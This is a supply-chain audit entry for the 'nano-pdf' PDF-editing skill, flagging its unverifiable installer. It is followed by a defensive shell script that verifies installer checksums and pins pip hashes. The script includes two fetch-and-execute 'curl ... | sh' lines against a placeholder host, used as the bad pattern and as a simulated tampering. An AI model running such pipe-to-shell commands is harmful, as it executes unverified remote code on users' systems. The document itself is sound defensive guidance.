nano-pdf
Warn
Audited by Socket on Mar 7, 2026
1 alert found:
Security alert (MEDIUM) in SKILL.md
The skill's stated purpose (PDF editing via natural language) is consistent with its described CLI usage. However, the installation path relies on an unverifiable 'uv' installer, which introduces a notable supply-chain risk and warrants caution. Data flow is predominantly local (reading and writing PDFs), with no evident credential exfiltration or network transfer of data, but the installation vector justifies classifying the overall risk as Suspicious to High because the binary is delivered with no means of verifying it. If the installer were replaced with a verifiable, official package-registry flow (e.g. pip install nano-pdf from PyPI with a standard build process), the risk would shift toward Benign.
Confidence: 70%
Severity: 70%
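The alert contrasts an unverifiable "fetch an installer and run it" step with a registry flow pip can verify. The script below is an added example, not code from the Socket audit or from the nano-pdf project: it shows a checksum-verified download in place of the pipe-to-shell pattern, and the hash-pinned requirements line that lets pip install --require-hashes enforce a known digest. The URL, the installer contents and the digests are constructed for illustration; install_verified, verify_sha256 and pin_requirement are names chosen here, not part of any tool.

```shell
#!/bin/sh
# Added example (not from the Socket audit or the nano-pdf project).
# Paths, URLs and file contents below are constructed for illustration.

# Portable SHA-256 of a file: coreutils sha256sum on Linux, shasum on macOS/BSD.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d ' ' -f 1
    else
        shasum -a 256 "$1" | cut -d ' ' -f 1
    fi
}

# verify_sha256 FILE EXPECTED_HEX: succeed (0) only when the digest matches.
# The expected digest must come from an out-of-band source (release notes,
# a signed SHA256SUMS file), never from the same server as the artefact.
verify_sha256() {
    actual=$(sha256_of "$1")
    [ "$actual" = "$2" ]
}

# The unverifiable pattern the audit objects to: whatever the server returns
# at that moment is executed with the user's privileges. Shown only as a comment.
#   curl -LsSf https://example.invalid/install.sh | sh

# The verifiable pattern: download to disk, check the digest, only then run.
# install_verified URL EXPECTED_HEX DEST  (hypothetical helper name)
install_verified() {
    url="$1"; expected="$2"; dest="$3"
    curl -LsSf -o "$dest" "$url" || return 1
    if ! verify_sha256 "$dest" "$expected"; then
        echo "digest mismatch for $url, refusing to run" >&2
        rm -f "$dest"
        return 1
    fi
    sh "$dest"
}

# For a PyPI package, pin the exact artefact digest and let pip enforce it:
#   pip install --require-hashes -r requirements.txt
# pin_requirement NAME VERSION SHA256_HEX prints one such requirements.txt line.
# The digest comes from `pip hash <downloaded file>` or the PyPI release page.
pin_requirement() {
    printf '%s==%s --hash=sha256:%s\n' "$1" "$2" "$3"
}

# Demonstration on a constructed "installer" script; no network access needed.
demo() {
    tmp=$(mktemp)
    printf 'echo "installing nano-pdf"\n' > "$tmp"
    good=$(sha256_of "$tmp")
    verify_sha256 "$tmp" "$good" && echo "untampered installer: digest ok"
    # Simulate a tampered download: the same file with an extra line appended.
    printf 'curl -s https://example.invalid/x | sh\n' >> "$tmp"
    if verify_sha256 "$tmp" "$good"; then
        echo "BUG: tampered file passed verification"
    else
        echo "tampered installer: digest mismatch, would not execute"
    fi
    rm -f "$tmp"
    # Example pinned line for a hypothetical release; digest is made up.
    pin_requirement nano-pdf 0.1.0 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
}

demo
```

The point of the comparison is where the digest comes from: a hash published next to the download on the same server gives no independent check, whereas a digest pinned in a requirements file under version control, or a SHA256SUMS file signed by the maintainer, lets a later substitution of the artefact be detected before anything is executed.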